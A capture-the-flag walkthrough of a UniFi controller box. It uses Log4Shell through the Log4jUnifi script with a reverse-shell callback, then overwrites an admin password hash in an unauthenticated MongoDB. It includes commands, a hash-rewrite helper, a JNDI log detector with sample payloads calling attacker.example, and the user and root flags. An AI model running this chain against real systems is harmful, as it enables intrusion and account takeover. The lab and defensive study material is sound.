* Nmap scan
* ![](https://hackmd.io/_uploads/HkV-2bAo3.png)
* Open ports: 22/SSH, 6789, 8080, 8443
* ![](https://hackmd.io/_uploads/ryPxHz0j3.png)
* Port 8443 is identified as `UniFi Network`, and nmap also reports a URL for it
* Opening that URL in a browser gives a `UniFi Network` login page
* ![](https://hackmd.io/_uploads/Sy96Hz0o3.png)
* The page shows version 6.4.54
* Searching for that version turns up CVE-2021-44228 (Log4Shell)
* ![](https://hackmd.io/_uploads/S1IywfRoh.png)

## [Log4j vulnerability](https://buzzorange.com/techorange/2021/12/21/what-is-log4j-and-log4shell/)

### [Log4jUnifi](https://github.com/puzzlepeaches/Log4jUnifi)

* Installation
* ![](https://hackmd.io/_uploads/ry1djGRoh.png)
* Usage

```bash=
usage: exploit.py [-h] -u URL -i CALLBACK -p PORT

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     Unifi Network Manager base URL
  -i CALLBACK, --ip CALLBACK
                        Callback IP for payload delivery and reverse shell.
  -p PORT, --port PORT  Callback port for reverse shell.
```

* Run Log4jUnifi against the controller, pointing the callback at our own host and listener port
* ![](https://hackmd.io/_uploads/BJYHx8Co3.png)

```bash=
python3 exploit.py -u https://10.129.212.112:8443 -i 10.10.14.18 -p 7787
```

* `nc` catches the reverse shell
* ![](https://hackmd.io/_uploads/SyRIxLCih.png)
* Read user.txt
* Upgrade to an interactive shell

```bash=
script /dev/null -c bash
```

* ![](https://hackmd.io/_uploads/Bk3mtURs3.png)
* user_flag: ||`6ced1a6a89e666c0620cdb10262ba127`||

## Privilege Escalation

* `system.properties` under `/usr/lib/unifi/data` and the logs under `/usr/lib/unifi/logs` both show a `mongodb` instance listening on port `27117`
* ![](https://hackmd.io/_uploads/H1RxAUAj2.png)
* ![](https://hackmd.io/_uploads/B1CMAL0o3.png)
* Connect to MongoDB (no authentication is required) and list the databases

```bash=
mongo --port 27117
show dbs
```

* ![](https://hackmd.io/_uploads/ByFAbD0s3.png)
* The `ace` database uses 0.002 GB; list its collections
* ![](https://hackmd.io/_uploads/Hy3KMDAj3.png)

```bash=
use ace
show collections
```

* Dumping the `admin` collection shows, in the first document, the admin's name and their hashed password

```bash=
db.admin.find()
```

* ![](https://hackmd.io/_uploads/S1ypmvRsn.png)
* Alternatively, `--eval` runs the query straight from the terminal and prints each document as JSON

```bash=
mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"
```

:::info
--eval: runs JavaScript from the terminal without dropping into the mongo shell
:::

* ![](https://hackmd.io/_uploads/BydL8vRsn.png)
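Before overwriting anything, it is worth checking exactly what came back from `ace.admin`. The following is an added example, not part of the original writeup or of the UniFi/MongoDB tooling: a Python helper that parses the `printjson` output of the `--eval` query above (mongo shell syntax such as `ObjectId("...")` and `NumberLong(...)` is not valid JSON), confirms that `x_shadow` is a sha512-crypt hash (`$6$salt$digest`, salt of at most 16 characters, 86-character digest), and emits the `--eval` update statement for a replacement hash. The sample document is constructed for this example; only the `_id` is taken from the writeup, and the replacement hash is the one the writeup generated with `mkpasswd`.

```python
import json
import re
from typing import Dict, List

# Constructed sample output of:
#   mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"
# Only the _id comes from the writeup; the other field values are made up.
SAMPLE_PRINTJSON = '''
{
	"_id" : ObjectId("61ce278f46e0fb0012d47ee4"),
	"name" : "administrator",
	"email" : "admin@example.invalid",
	"x_shadow" : "$6$SaltSalt$0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ./0123456789abcdefghijkl",
	"time_created" : NumberLong(1640900392),
	"last_site_name" : "default"
}
'''

# Replacement hash from the writeup (generated there with mkpasswd -m sha-512).
NEW_HASH = ("$6$xCWMO7iAEjAOyJb1$UZYfp4eooHvXNFDXVQtiWRu1mKU6zgFEnDY/7Ww8AWJ5"
            "cFEzwoHk10diiKG4dn29USgsgoJ.ry0RMkEOq/eac.")

# mongo shell type wrappers that are not valid JSON -> plain JSON values
_SHELL_TYPES = [
    (re.compile(r'ObjectId\("([0-9a-fA-F]{24})"\)'), r'"\1"'),
    (re.compile(r'NumberLong\("?(-?\d+)"?\)'), r'\1'),
    (re.compile(r'ISODate\(("[^"]*")\)'), r'\1'),
]
_NON_SPACE = re.compile(r"\S")


def parse_printjson(text: str) -> List[Dict]:
    """Turn the concatenated documents printjson emits into a list of dicts."""
    for pattern, repl in _SHELL_TYPES:
        text = pattern.sub(repl, text)
    docs, pos, decoder = [], 0, json.JSONDecoder()
    while True:
        start = _NON_SPACE.search(text, pos)   # skip whitespace between documents
        if not start:
            return docs
        doc, pos = decoder.raw_decode(text, start.start())
        docs.append(doc)


_CRYPT_ALPHABET = set("./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz")


def parse_crypt_hash(value: str) -> Dict[str, object]:
    """Split a $6$[rounds=N$]salt$digest string and sanity-check each part."""
    parts = value.split("$")
    if len(parts) < 4 or parts[0] != "" or parts[1] != "6":
        raise ValueError("not a sha512-crypt ($6$) hash")
    rounds, fields = 5000, parts[2:]          # 5000 is the crypt(3) default
    if fields[0].startswith("rounds="):
        rounds = int(fields[0][len("rounds="):])
        fields = fields[1:]
    if len(fields) != 2:
        raise ValueError("unexpected number of $-separated fields")
    salt, digest = fields
    if not 1 <= len(salt) <= 16:
        raise ValueError("sha512-crypt salt must be 1..16 characters")
    if len(digest) != 86 or not set(digest) <= _CRYPT_ALPHABET:
        raise ValueError("sha512-crypt digest must be 86 crypt-base64 characters")
    return {"scheme": "sha512-crypt", "rounds": rounds, "salt": salt, "digest": digest}


def build_update_eval(object_id: str, new_hash: str) -> str:
    """JavaScript for `mongo --port 27117 ace --eval '<this>'` that swaps x_shadow."""
    parse_crypt_hash(new_hash)               # refuse to write a hash UniFi cannot verify
    if not re.fullmatch(r"[0-9a-fA-F]{24}", object_id):
        raise ValueError("ObjectId must be 24 hex characters")
    return ('db.admin.update({"_id":ObjectId(%s)},{$set:{"x_shadow":%s}})'
            % (json.dumps(object_id), json.dumps(new_hash)))


if __name__ == "__main__":
    for doc in parse_printjson(SAMPLE_PRINTJSON):
        info = parse_crypt_hash(doc["x_shadow"])
        print(doc["name"], info["scheme"], "salt=" + str(info["salt"]))
        print(build_update_eval(doc["_id"], NEW_HASH))
```

The statement this produces is byte-for-byte the one used in the next step; wrap it in single quotes on the command line, since the `$` characters in `$6$...` and `$set` would otherwise be expanded by the shell.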
* We now know where the admin password is stored and that the `x_shadow` field holds a salted SHA-512 crypt hash (the `$6$` prefix). Generate a hash of a password of our own with `mkpasswd` and use it to overwrite the stored one
* ![](https://hackmd.io/_uploads/B1QG_DRj2.png)

```bash=
mongo --port 27117 ace --eval 'db.admin.update({"_id":ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"$6$xCWMO7iAEjAOyJb1$UZYfp4eooHvXNFDXVQtiWRu1mKU6zgFEnDY/7Ww8AWJ5cFEzwoHk10diiKG4dn29USgsgoJ.ry0RMkEOq/eac."}})'
```

* The single quotes around the `--eval` argument matter: the hash and `$set` contain `$`, which the shell would otherwise expand as variables and silently corrupt the value written
* ![](https://hackmd.io/_uploads/HkPwowRih.png)
* The overwrite succeeds
* We can now log in to the login page found at the start with the password we chose
* ![](https://hackmd.io/_uploads/B1k_0wCjn.png)
* In the controller settings, enable SSH and set the SSH password
* SSH in and read `root.txt`
* ![](https://hackmd.io/_uploads/rJlZydRs3.png)
* root_flag: ||`e50bc93c75b634e4b272d2f771c33681`||

## Supplement

* [Root cause of the Log4j vulnerability](https://blog.csdn.net/Koikoi12/article/details/121906895)
* https://buzzorange.com/techorange/2021/12/21/what-is-log4j-and-log4shell/

The Log4j vulnerability arises from Java's JNDI combined with LDAP: Log4j's message lookups resolve `${jndi:...}` strings that appear in logged data through JNDI, which can contact an attacker-controlled LDAP server and load the object it returns.

* JNDI injection
* ![](https://hackmd.io/_uploads/SydAZ3y3n.png)

### What is Log4j?

* A Java logging library developed under the Apache Software Foundation, hence also known as `Apache Log4j`

### Mitigation

* The Swiss GovCERT article "Zero-Day Exploit Targeting Popular Java Library Log4j" includes a diagram showing where in the attack chain each defence applies:
* ![log4j_attack-720x487](https://hackmd.io/_uploads/H1ZsWPNrT.jpg)
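The JNDI lookup mechanism described above is also what a defender looks for in logs. As an added example that is not from the writeup or from any of the linked articles: a Python detector that finds `${jndi:...}` lookups in log lines, including the common evasions (URL encoding, `${lower:j}`/`${upper:...}` case lookups, and `${prefix:key:-default}` default-value syntax such as `${::-j}`), by repeatedly resolving the innermost lookup the way Log4j would before checking for the `jndi:` prefix. The sample access-log lines are constructed; the hostnames and the `10.10.14.18:1389` callback are illustrative.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Constructed sample access-log lines (not captured traffic). Lines 2-5 carry
# Log4Shell payloads in the User-Agent position; lines 1 and 6 are benign.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${jndi:ldap://10.10.14.18:1389/o=tomcat}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}${lower:n}${lower:d}i:ldap://attacker.example/a}"',
    '10.0.0.11 - - "GET / HTTP/1.1" 200 "${${env:NOPE:-j}ndi:${env:NOPE:-l}dap://attacker.example/a}"',
    '10.0.0.12 - - "GET / HTTP/1.1" 200 "%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3Armi%3A%2F%2Fattacker.example%2Fa%7D"',
    '10.0.0.13 - - "POST /api/login HTTP/1.1" 401 "${date:yyyy} ${ctx:user}"',
]

# A lookup with no nested lookup inside it; Log4j resolves these first.
_INNERMOST = re.compile(r"\$\{([^{}]*)\}")
# What we are hunting for once everything around it has been resolved.
_JNDI = re.compile(r"\$\{jndi:[^{}]*\}", re.IGNORECASE)


def _resolve(match: "re.Match") -> str:
    """Resolve one innermost ${...} the way Log4j 2.x lookups would."""
    body = match.group(1)
    low = body.lower()
    if low.startswith("jndi:"):
        return match.group(0)                  # keep the JNDI lookup intact
    if low.startswith("lower:"):
        return body[len("lower:"):].lower()
    if low.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:                           # ${prefix:key:-default} -> default
        return body.split(":-", 1)[1]
    return body                                # unknown lookup: drop the wrapper


def normalize(text: str, max_passes: int = 32) -> str:
    """Undo URL encoding, then resolve nested lookups until nothing changes."""
    for _ in range(3):                         # handle double-encoded payloads
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_passes):                # bounded: payloads can be deeply nested
        resolved = _INNERMOST.sub(_resolve, text)
        if resolved == text:
            break
        text = resolved
    return text


def detect(line: str) -> Optional[str]:
    """Return the normalized ${jndi:...} lookup found in a log line, or None."""
    found = _JNDI.search(normalize(line))
    return found.group(0) if found else None


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """(1-based line number, payload) for every line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, 1):
        payload = detect(line)
        if payload:
            hits.append((number, payload))
    return hits


if __name__ == "__main__":
    for number, payload in scan(SAMPLE_LOG_LINES):
        print(f"line {number}: {payload}")
```

Matching only the literal string `${jndi:` would miss lines 3 to 5; resolving the lookups first reduces all four payloads to the same `${jndi:<scheme>://...}` form, which is also what the vulnerable Log4j would have evaluated. This catches what reached the log; it cannot tell whether the server actually performed the lookup, so a hit still needs to be correlated with outbound LDAP/RMI connections from the host.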